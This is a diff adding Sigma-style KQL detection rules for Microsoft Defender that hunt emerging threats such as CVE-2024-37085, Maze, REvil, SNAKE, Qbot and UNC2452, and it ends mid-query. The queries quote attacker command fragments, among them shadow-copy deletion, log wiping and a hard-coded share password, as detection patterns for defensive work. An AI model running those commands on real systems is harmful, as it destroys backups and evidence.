@@ -0,0 +1,13 @@ +// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group +// Author: frack113 +// Date: 2024-07-29 +// Level: high +// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". +This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. +VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. + +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-37085, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql new file mode 100644 index 00000000..38ce5982 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Goofy Guineapig Backdoor Activity +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-14 +// Level: high +// Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "choice /t %d /d y /n >nul" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql new file mode 100644 index 00000000..097b0835 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential KamiKakaBot Activity - Lure Document Execution +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-03-22 +// Level: medium +// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. +This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql new file mode 100644 index 00000000..34337005 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Maze Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-08 +// Level: critical +// Description: Detects specific process characteristics of Maze ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.t1047, attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith ".tmp" and InitiatingProcessFolderPath endswith "\\WINWORD.exe") or (ProcessCommandLine endswith "shadowcopy delete" and FolderPath endswith "\\wmic.exe" and InitiatingProcessFolderPath contains "\\Temp\\") or (ProcessCommandLine contains "\\..\\..\\system32" and ProcessCommandLine endswith "shadowcopy delete") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql new file mode 100644 index 00000000..0ce123a9 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql @@ -0,0 +1,19 @@ +// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE +// Author: @kostastsale +// Date: 2023-06-01 +// Level: medium +// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. + +MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. + +Hunting Opportunity + +Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats +// False Positives: +// - Initial software installation and software updates. + +DeviceProcessEvents +| where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql new file mode 100644 index 00000000..fa85f495 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential QBot Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-01 +// Level: critical +// Description: Detects potential QBot activity by looking for process executions used previously by QBot +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\wscript.exe" and InitiatingProcessFolderPath endswith "\\WinRAR.exe") or ProcessCommandLine contains " /c ping.exe -n 6 127.0.0.1 & type " or (ProcessCommandLine contains "regsvr32.exe" and ProcessCommandLine contains "C:\\ProgramData" and ProcessCommandLine contains ".tmp") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql new file mode 100644 index 00000000..41679e16 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql @@ -0,0 +1,10 @@ +// Title: Potential Raspberry Robin Dot Ending File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: high +// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql new file mode 100644 index 00000000..0e155f3c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql @@ -0,0 +1,14 @@ +// Title: Potential SAP NetWeaver Webshell Creation +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents +| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work" or FolderPath contains "\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql new file mode 100644 index 00000000..41d16930 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql @@ -0,0 +1,14 @@ +// Title: Potential SAP NetWeaver Webshell Creation - Linux +// Author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-28 +// Level: medium +// Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, +which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats +// False Positives: +// - Legitimate creation of jsc or java files in these locations + +DeviceFileEvents +| where (FolderPath endswith ".jsp" or FolderPath endswith ".java" or FolderPath endswith ".class") and (FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/" or FolderPath contains "/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql new file mode 100644 index 00000000..8d6a2a38 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql @@ -0,0 +1,12 @@ +// Title: Potential SNAKE Malware Installation Binary Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql new file mode 100644 index 00000000..de289055 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql @@ -0,0 +1,12 @@ +// Title: Potential SNAKE Malware Installation CLI Arguments Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql new file mode 100644 index 00000000..beb21616 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql @@ -0,0 +1,10 @@ +// Title: Potential SNAKE Malware Persistence Service Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql new file mode 100644 index 00000000..f7c78887 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Snatch Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-08-26 +// Level: high +// Description: Detects specific process characteristics of Snatch ransomware word document droppers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, detection.emerging-threats +// False Positives: +// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely + +DeviceProcessEvents +| where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql new file mode 100644 index 00000000..b4dc7b88 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql @@ -0,0 +1,12 @@ +// Title: PrinterNightmare Mimikatz Driver Name +// Author: Markus Neis, @markus_neis, Florian Roth +// Date: 2021-07-04 +// Level: critical +// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql new file mode 100644 index 00000000..db5ce9c1 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql @@ -0,0 +1,12 @@ +// Title: Qakbot Uninstaller Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2023-08-31 +// Level: high +// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql new file mode 100644 index 00000000..5d31244e --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql @@ -0,0 +1,12 @@ +// Title: Raspberry Robin Initial Execution From External Drive +// Author: @kostastsale +// Date: 2022-05-06 +// Level: high +// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql new file mode 100644 index 00000000..0e2abbb2 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql @@ -0,0 +1,12 @@ +// Title: Raspberry Robin Subsequent Execution of Commands +// Author: @kostastsale +// Date: 2022-05-06 +// Level: high +// Description: Detects raspberry robin subsequent execution of commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql new file mode 100644 index 00000000..5dd3d844 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql @@ -0,0 +1,10 @@ +// Title: REvil Kaseya Incident Malware Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-03 +// Level: critical +// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql new file mode 100644 index 00000000..d81d716c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql @@ -0,0 +1,12 @@ +// Title: Rorschach Ransomware Execution Activity +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-04 +// Level: critical +// Description: Detects Rorschach ransomware execution activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql new file mode 100644 index 00000000..88ef0160 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql @@ -0,0 +1,12 @@ +// Title: SNAKE Malware Installer Name Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: low +// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis. + +DeviceFileEvents +| where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql new file mode 100644 index 00000000..69a9adc5 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql @@ -0,0 +1,12 @@ +// Title: SNAKE Malware Kernel Driver File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: critical +// Description: Detects SNAKE malware kernel driver file indicator +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql new file mode 100644 index 00000000..fdd0e8b5 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql @@ -0,0 +1,10 @@ +// Title: SNAKE Malware WerFault Persistence File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: high +// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql new file mode 100644 index 00000000..405d7123 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql @@ -0,0 +1,10 @@ +// Title: Trickbot Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-11-26 +// Level: high +// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql new file mode 100644 index 00000000..e618219e --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql @@ -0,0 +1,10 @@ +// Title: TropicTrooper Campaign November 2018 +// Author: @41thexplorer, Microsoft Defender ATP +// Date: 2019-11-12 +// Level: high +// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql new file mode 100644 index 00000000..068b39ef --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql @@ -0,0 +1,10 @@ +// Title: Turla Group Lateral Movement +// Author: Markus Neis +// Date: 2017-11-07 +// Level: critical +// Description: Detects automated lateral movement by Turla group +// MITRE Tactic: Execution +// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql new file mode 100644 index 00000000..f52fc752 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql @@ -0,0 +1,12 @@ +// Title: UNC2452 PowerShell Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-20 +// Level: critical +// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql new file mode 100644 index 00000000..6d08322a --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql @@ -0,0 +1,10 @@ +// Title: UNC2452 Process Creation Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-22 +// Level: high +// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql new file mode 100644 index 00000000..84f03c5d --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql @@ -0,0 +1,12 @@ +// Title: UNC4841 - Barracuda ESG Exploitation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith 